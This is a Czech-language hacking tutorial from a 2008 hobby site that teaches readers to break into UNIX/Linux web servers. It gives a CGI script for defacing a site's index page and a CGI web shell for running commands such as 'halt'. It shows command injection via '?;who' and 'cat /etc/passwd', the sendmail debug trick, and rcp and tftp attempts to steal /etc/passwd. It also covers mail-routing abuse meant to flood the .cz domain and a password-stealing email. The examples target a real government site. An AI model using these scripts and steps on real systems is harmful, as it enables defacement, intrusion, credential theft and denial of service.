Základy HACKU 2 :D

Základy hacku 2.  Teď se podíváme na UNIX(LINUX).

Tady není situace jednoduchá.Tento stařec již má všechny mouchy vychytané. Není to jednoduché, spíš je to téměř nemožné, je-li zde vše dobře nastavené. Jak dálkově změnit WWW stránku? Je to vůbec možné? Při troše štěstí ano. Jak tedy na to? Nejprve si vytvoříme svůj hacknutý soubor index.html a speciální CGI script.V UNIXU bývají v adresáři /home/ftp/incoming/ nastavena přístupová práva na rwxrwxrwx to je právo zápisu všem. Do tohoto adresáře pomocí FTP přeneseme tyto dva soubory.To je index.html a např.hack.cgi.Důležitý je program který je v cgi scriptu tady je: #!/bin/sh echo 'Content-Type: text/html' echo cp /home/ftp/incoming/index.html /www/htdocs/ Jednoduché že.Ale má to problém,musíme dostat nějakým způsobem tento cgi script do adresáře kde je povoleno provádění CGI scriptů nejčastěji cgi-bin.Toto se nastavuje v souboru httpd.conf direktivou ScriptAlias. Jinak aby bylo jasno je řeč o WWW serveru Apache kterých pracuje pod UNIXEM většina.Ten je reprezentován souborem httpd. Podaří-li se nám dostat tent o cgi script do tohoto adresáře stačí jenom napsat ve vašem prohlížeči URL k tomuto cgi scriptu a stisknout enter. Ale to ještě není vše.WWW server musí pracovat jako root.To nastavuje správce opět v souboru httpd.conf.A kořen dokumentů musí být umístněn v adresáři /www/htdocs/. Ještě jeden tip.Instalujeme-li server Apache tak vytvoří automaticky adresář cgi-bin ve kterém je standardně umístněn script s názvem test-cgi. Tento skript by měl správce serveru odstranit,protože poskytuje důležité informace případnému útočníkovi. Je-li tento skript přítomen stačí napsat toto URL: http://jmeno_serveru/cgi-bin/test-cgi poté se na obrazovce prohlížeče objeví zajímavé informace o serveru Apache. Další možností je odhalit bezpečnostní díru v CGI skriptu.Jak na to? Objeví-li se nám na řádku např.URL http://www.firma.cz/cgi-bin/jmeno.cgi? můžeme na konec přidat toto: http://www.firma.cz/cgi-bin/jmeno.cgi?;who Středník je nebezpečný znak a může způsobit při špatně napsaném cgi skriptu to že se provede příkaz zapsaný na ko nci řádku.V tomto případě příkaz who. Ale může to být třeba cat /etc/passwd. Dále bych se chtěl ještě zmínit o CGI scriptu který umožňuje vzdálené zadávání příkazů operačnímu systému UNIX(LINUX) přes WWW prohlížeč. Používá značky ISINDEX.Opět tento CGI script musí být umístněn v adresáři kde je povoleno spouštění CGI scriptů.Většinou CGI-BIN. Zde je: #!/bin/sh echo "Content-type: text/html" echo echo '' echo '' echo '' echo ' This is a searchable index. Enter search keywords: ' $1 Tento CGI script když se nám podaří propašovat nějakým způsobem do adresáře CGI-BIN a napíšeme k němu ve svém prohlížeči cestu,tak nám nabídne textové pole do kterého můžeme zadávat příkazy.Např.ls;ps;cat ale třeba i halt pracuje-li www server Apache jako root.Co tento příkaz způsobí je zřejmé z jeho názvu. Jinak jestli hacker potřebuje zjistit jaký www server používá vzdálený systém,žádný problém.Použijeme telnet,ale ne ten co je ve Windows 95 Musíme použít takový který umožňuje připojování na různé porty.Nejlepší je samozřejmě int eraktivní telnet z linuxu.Takže se připojíme na port 80: % telnet 193.179.4.2 80 Poté zadejte GET / announclist.html HTTP/1.0 Měli byste dostat odpověď velmi rozsáhlou. IP adresu jsem si vymyslel ale je to adresa http://www.hrad.cz (aktuální). Když jsem u telnetu tak to je samozřejmě standardní hackerský program. Lze se připojovat na různé porty a zkoušet zadávat různé textové i netextové řetězce a pokoušet se proniknout do systému.Nejznámější je samozřejmě SMTP server který pracuje na portu 25 kde naslouchá.Jedná se o program sendmail spuštěný jako démon.Tento program bývá na některých systémech kompilován se vzdáleným ladícím přístupem - zadáme: % telnet 193.179.4.2 25 Trying 193.179.4.2 .... Connected to 193.179.4.2 Escape character is '^]'. 220 192179.4.2 Sendmail 4.1/1.36 ready at Mon, 15 Jun 97 09:51:56 EDT Pak zadáme příkaz: debug Jestliže budete dotázáni na heslo máte naději. Když jsme u elektronické pošty je potřeba se na ní podívat trochu více. Posláním vhodného emailu nezkušenému uživateli lze získ at jeho přístupová hesla.Např.tento html dokument odešle na váš email přístupové heslo vzdáleného uživatele.Samozřejmě pokud to vzdálený uživatel neprokoukne. Pomocí elektronické pošty lze i Internet zahltit.Při psaní emailové adresy lze přikázat kudy má dopis jít. Používá se následující formát: uživatel%doména1@doména2 Dopis je dopraven k cílovému poštmistrovi pro doménu "doména2".Ten se podívá na uživatelskou část a uvidí v ní %.Odtrhne z adresy zavináč a vše za ním, poslední procento nahradí zavináčem a odešle dopis na vzniklou adresu. Díky tomuto mechanizmu můžeme diktovat kudy má dopis projít. Domén můžeme uvést veliké množství.Jestliže se domluví více hackerů a sítí se přenáší velké objemy dat,např.binární soubory o velikosti asi 500KB přes obrovské množství serverů,lze celou Internetovou doménu(např.cz), zcela zablokovat na mnoho hodin. Dále je možné se přihlásit telnetem na port 79 kde pracuje služba finger. Ta někdy umožňuje vzdálená zadávání tohoto příkazu a tím získávání informací o uživatelích na systému. Jinak je zřejmé že jestliže se vám podaří získat přístup do shelu jako root tak je vše jasné.A jestliže navíc je povoleno přihlášení uživatele root jak telnetem tak přes FTP tak není co řešit ale taková situace nastane jenom zřídka. Zde je seznam služeb standardně spuštěných na systému UNIX(LINUX). služba port ftp-data 20, ftp 21, telnet 23, SMTP 25, Whois 43, Gopher 70, Finger 79, http 80, pop-3 110. Na tyto porty je možno se připojovat telnetem a zkoušet. Hodně práce a času nám ušetří různé hackerské nástroje které jsou dostupné např.na www.security.sk nebo na www.rootshell.com Dále můžeme zkoušet pracujeme-li na LINUXU tak zvané r příkazy jedná se o rlogin,rcp,rsh. Příklad: %rlogin 193.179.4.2 a uvidíme co se bude dít. %rcp 193.179.4.2: /etc/passwd /home/ Tímto příkazem se pokoušíme zkopírovat super tajný soubor passwd na svůj systém. %rsh 193.179.4.2 ps -aux Tímto příkazem se snažíme zjistit s jakými oprávněními je spuštěn www server na vzdáleném systému. Jenom tak na okraj jestliže chcete zjist it IP adresu vzdáleného systému stačí použít program ping např. je i ve win 95: Příklad: ping www.hrad.cz Výsledek je: Pinging from 193.179.4.2:bytes=32 time 60ms TTL64 Další možnost jak napadnout vzdálený systém je program tftp napíšem: $ tftp 193.179.4.2 tftp> get /etc/passwd Error code 1: File not found tftp> quit Jestliže dostaneme takovouto odpověď máme smůlu.Služba je zakázaná.

Vyhledávání

© 2008 Všechna práva vyhrazena.Projekt by Dandy_CZ & Petr Kubiš..

TOPlist